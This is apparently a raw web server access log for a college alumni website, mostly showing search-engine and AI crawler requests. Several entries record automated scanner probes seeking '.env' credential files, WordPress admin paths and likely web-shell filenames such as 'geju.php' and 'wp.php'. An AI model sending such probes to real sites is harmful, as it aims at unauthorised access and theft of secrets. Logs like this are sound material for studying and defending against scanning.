66.249.68.69 - - [25/Jun/2025:18:07:16 +0000] "GET /cr%C3%A8me-parfum%C3%A9e-pour-mains-romance-delia-charm-aroma-ritual-ss-23343708 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.67 - - [25/Jun/2025:18:07:44 +0000] "GET /cr%C3%A8me-parfum%C3%A9e-pour-mains-romance-delia-charm-aroma-ritual-ss-23343708 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.68 - - [25/Jun/2025:19:19:45 +0000] "GET /assets/js/jquery-1.10.2.min.js HTTP/1.1" 200 93107 "https://alumni.dbcollege.ac.in/?p=kz/S5038236.html" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.69 - - [25/Jun/2025:19:19:46 +0000] "GET /assets/css/jquery-ui.css HTTP/1.1" 200 31564 "https://alumni.dbcollege.ac.in/?p=kz/S5038236.html" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.68 - - [25/Jun/2025:19:19:47 +0000] "GET /assets/js/bootstrap.min.js HTTP/1.1" 200 48950 "https://alumni.dbcollege.ac.in/?p=kz/S5038236.html" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.68 - - [25/Jun/2025:19:19:48 +0000] "GET /assets/css/bootstrap.min.css HTTP/1.1" 200 144877 "https://alumni.dbcollege.ac.in/?p=kz/S5038236.html" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [25/Jun/2025:19:19:49 +0000] "GET /assets/css/font-awesome.min.css HTTP/1.1" 200 31000 "https://alumni.dbcollege.ac.in/?p=kz/S5038236.html" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [25/Jun/2025:19:19:50 +0000] "GET /assets/css/style.css HTTP/1.1" 200 22749 "https://alumni.dbcollege.ac.in/?p=kz/S5038236.html" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [25/Jun/2025:19:19:51 +0000] "GET /assets/js/jquery-ui.js HTTP/1.1" 200 519186 "https://alumni.dbcollege.ac.in/?p=kz/S5038236.html" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [25/Jun/2025:19:24:15 +0000] "GET /serenor-60-lep-ss-22205303 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.67 - - [25/Jun/2025:19:24:46 +0000] "GET /serenor-60-lep-ss-22205303 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.147.33.166 - - [25/Jun/2025:20:24:03 +0000] "GET /index.php/css/?wp-admin/css/ HTTP/1.1" 404 1130 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
103.147.33.166 - - [25/Jun/2025:20:24:11 +0000] "GET /.well-known/ HTTP/1.1" 200 978 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
103.147.33.166 - - [25/Jun/2025:20:24:15 +0000] "GET /index.php/default/files/?sites/default/files/ HTTP/1.1" 404 1130 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
103.147.33.166 - - [25/Jun/2025:20:24:20 +0000] "GET /index.php/controller/extension/extension/?admin/controller/extension/extension/ HTTP/1.1" 404 1130 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
103.147.33.166 - - [25/Jun/2025:20:24:24 +0000] "GET /index.php/?uploads/ HTTP/1.1" 200 12841 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
103.147.33.166 - - [25/Jun/2025:20:24:31 +0000] "GET /index.php/?images/ HTTP/1.1" 200 12868 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
103.147.33.166 - - [25/Jun/2025:20:24:35 +0000] "GET /index.php/?files/ HTTP/1.1" 200 12908 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
66.249.68.67 - - [25/Jun/2025:20:40:48 +0000] "GET / HTTP/1.1" 200 12892 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [25/Jun/2025:20:41:00 +0000] "GET /assets/js/jquery-1.10.2.min.js HTTP/1.1" 200 93107 "https://alumni.dbcollege.ac.in/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [25/Jun/2025:20:41:00 +0000] "GET /assets/js/bootstrap.min.js HTTP/1.1" 200 48950 "https://alumni.dbcollege.ac.in/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [25/Jun/2025:20:41:01 +0000] "GET /assets/css/jquery-ui.css HTTP/1.1" 200 31564 "https://alumni.dbcollege.ac.in/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.68 - - [25/Jun/2025:20:41:03 +0000] "GET /assets/css/font-awesome.min.css HTTP/1.1" 200 31000 "https://alumni.dbcollege.ac.in/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.68 - - [25/Jun/2025:20:41:03 +0000] "GET /assets/css/style.css HTTP/1.1" 200 22749 "https://alumni.dbcollege.ac.in/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [25/Jun/2025:20:41:04 +0000] "GET /assets/css/bootstrap.min.css HTTP/1.1" 200 144877 "https://alumni.dbcollege.ac.in/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [25/Jun/2025:20:41:05 +0000] "GET /assets/js/jquery-ui.js HTTP/1.1" 200 519186 "https://alumni.dbcollege.ac.in/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.69 - - [25/Jun/2025:20:42:01 +0000] "GET / HTTP/1.1" 200 12937 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.68 - - [25/Jun/2025:20:42:02 +0000] "GET / HTTP/1.1" 200 12844 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.69 - - [25/Jun/2025:20:42:03 +0000] "GET /favicon.ico HTTP/1.1" 404 1130 "-" "Googlebot-Image/1.0"
66.249.68.69 - - [25/Jun/2025:20:52:58 +0000] "GET /basket-puma-ignite-ultimate-188605-02-ss-21696911 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.68 - - [25/Jun/2025:20:53:34 +0000] "GET /basket-puma-ignite-ultimate-188605-02-ss-21696911 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.208.138.52 - - [25/Jun/2025:21:38:00 +0000] "GET /index.php?geju.php HTTP/1.1" 200 12912 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.208.138.52 - - [25/Jun/2025:21:38:33 +0000] "GET /index.php/plugins/about.php?wp-content/plugins/about.php HTTP/1.1" 404 1130 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.208.138.52 - - [25/Jun/2025:21:39:01 +0000] "GET /index.php?wp.php HTTP/1.1" 200 12890 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.249.68.68 - - [25/Jun/2025:21:46:58 +0000] "GET /saucisse-grill%C3%A9e-haricots-verts-et-pommes-de-terre-%C3%A9cras%C3%A9es-ss-40479982 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [25/Jun/2025:21:47:31 +0000] "GET /saucisse-grill%C3%A9e-haricots-verts-et-pommes-de-terre-%C3%A9cras%C3%A9es-ss-40479982 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.69 - - [25/Jun/2025:22:14:17 +0000] "GET /levier-de-vitesse-ford-ka-ss-7553776 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.69 - - [25/Jun/2025:22:14:17 +0000] "GET /robots.txt HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [25/Jun/2025:22:15:29 +0000] "GET /robots.txt HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [25/Jun/2025:22:15:29 +0000] "GET /levier-de-vitesse-ford-ka-ss-7553776 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [25/Jun/2025:22:49:37 +0000] "GET /llave-a-escuadra-doble-para-lavadora-ss-47217613 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.67 - - [25/Jun/2025:22:50:32 +0000] "GET /llave-a-escuadra-doble-para-lavadora-ss-47217613 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.69 - - [26/Jun/2025:00:27:38 +0000] "GET /vanille-en-poudre-de-prot%C3%A9ines-v%C3%A9g%C3%A9taliennes-vega-sport-premium-ss-29676291 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.69 - - [26/Jun/2025:00:28:19 +0000] "GET /vanille-en-poudre-de-prot%C3%A9ines-v%C3%A9g%C3%A9taliennes-vega-sport-premium-ss-29676291 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.68 - - [26/Jun/2025:00:59:37 +0000] "GET /pat%C3%A8re-en-bois-s-8054101 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.68 - - [26/Jun/2025:01:05:07 +0000] "GET /pat%C3%A8re-en-bois-s-8054101 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.68 - - [26/Jun/2025:01:07:52 +0000] "GET /plafonnier-luminaire-moli-chrome-satin%C3%A9-rond-spots-gu10-ip20-ss-20951318 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.68 - - [26/Jun/2025:01:32:39 +0000] "GET /programme-fitness-femmes-perte-de-poids-prise-de-muscles-ss-14035469 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [26/Jun/2025:01:34:02 +0000] "GET /programme-fitness-femmes-perte-de-poids-prise-de-muscles-ss-14035469 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.67 - - [26/Jun/2025:01:42:18 +0000] "GET /plafonnier-luminaire-moli-chrome-satin%C3%A9-rond-spots-gu10-ip20-ss-20951318 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
4.227.36.44 - - [26/Jun/2025:01:49:16 +0000] "GET /robots.txt HTTP/1.1" 404 1130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:49:24 +0000] "GET / HTTP/1.1" 200 12836 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:49:33 +0000] "GET /assets/images/logo.png HTTP/1.1" 200 222931 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:49:36 +0000] "GET /assets/js/jquery-1.10.2.min.js HTTP/1.1" 200 93107 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:49:39 +0000] "GET /assets/css/style.css HTTP/1.1" 200 22749 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:49:43 +0000] "GET /assets/js/jquery-ui.js HTTP/1.1" 200 519186 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:49:46 +0000] "GET /assets/css/jquery-ui.css HTTP/1.1" 200 31564 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:49:49 +0000] "GET /admin HTTP/1.1" 200 3791 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:49:52 +0000] "GET /assets/css/bootstrap.min.css HTTP/1.1" 200 144877 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:49:56 +0000] "GET /Authentication/signUp HTTP/1.1" 200 10268 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:49:59 +0000] "GET /assets/js/bootstrap.min.js HTTP/1.1" 200 48950 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:02 +0000] "GET /assets/images/bb2.jpg HTTP/1.1" 404 1130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:06 +0000] "GET /assets/images/s1.jpg HTTP/1.1" 404 1130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:09 +0000] "GET /assets/images/tt1.png HTTP/1.1" 404 1130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:12 +0000] "GET /assets/admin/css/style-liberty.css HTTP/1.1" 200 274312 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:15 +0000] "GET /Home HTTP/1.1" 200 12877 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:22 +0000] "GET /assets/admin/images/img-sprite.html HTTP/1.1" 404 1130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:24 +0000] "GET /assets/admin/images/cross.html HTTP/1.1" 404 1130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:27 +0000] "GET /assets/admin/images/mark2.html HTTP/1.1" 404 1130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:29 +0000] "GET /assets/admin/images/desk.jpg HTTP/1.1" 404 1130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:32 +0000] "GET /assets/admin/fonts/fontawesome-webfont3e6e.woff2?v=4.7.0 HTTP/1.1" 200 77160 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:34 +0000] "GET /assets/admin/images/up-down.html HTTP/1.1" 404 1130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:36 +0000] "GET /assets/admin/fonts/fontawesome-webfontd41d.eot HTTP/1.1" 200 165742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:38 +0000] "GET /assets/admin/images/sort_asc_disabled.html HTTP/1.1" 404 1130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:41 +0000] "GET /assets/admin/fonts/fontawesome-webfont3e6e.ttf?v=4.7.0 HTTP/1.1" 200 165548 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:43 +0000] "GET /assets/admin/images/sort_desc_disabled.html HTTP/1.1" 404 1130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:45 +0000] "GET /assets/admin/fonts/fontawesome-webfont3e6e.woff?v=4.7.0 HTTP/1.1" 200 98024 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:47 +0000] "GET /assets/admin/fonts/fontawesome-webfont3e6e.eot?v=4.7.0 HTTP/1.1" 200 165742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:49 +0000] "GET /assets/admin/fonts/fontawesome-webfont3e6e.svg?v=4.7.0 HTTP/1.1" 200 444379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.200 - - [26/Jun/2025:01:50:51 +0000] "GET /assets/admin/images/search.html HTTP/1.1" 404 1130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.68.69 - - [26/Jun/2025:02:15:40 +0000] "GET /mille-casque-noir-de-carbone-s-49623074 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.69 - - [26/Jun/2025:02:18:26 +0000] "GET /mille-casque-noir-de-carbone-s-49623074 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
196.251.72.199 - - [26/Jun/2025:03:11:09 +0000] "GET /index.php?.env HTTP/1.1" 200 12846 "http://alumni.dbcollege.ac.in//.env" "Go-http-client/1.1"
103.90.149.55 - - [26/Jun/2025:03:35:27 +0000] "GET /index.php?.env HTTP/1.1" 200 12940 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
173.252.87.21 - - [26/Jun/2025:04:03:47 +0000] "GET /robots.txt HTTP/1.1" 404 1130 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.249.68.68 - - [26/Jun/2025:04:34:10 +0000] "GET /plantes-de-ch%C3%82taignier-commun-castanea-sativa-ss-21157015 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.69 - - [26/Jun/2025:04:38:58 +0000] "GET /plantes-de-ch%C3%82taignier-commun-castanea-sativa-ss-21157015 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.90.149.55 - - [26/Jun/2025:04:55:29 +0000] "GET /index.php?.env HTTP/1.1" 200 12913 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
104.210.140.133 - - [26/Jun/2025:05:50:53 +0000] "GET /robots.txt HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
104.210.140.139 - - [26/Jun/2025:05:50:55 +0000] "GET /index.php?robots.txt HTTP/1.1" 200 12895 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
66.249.68.68 - - [26/Jun/2025:06:42:16 +0000] "GET /pipe-kada-design-or-s-36895938 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
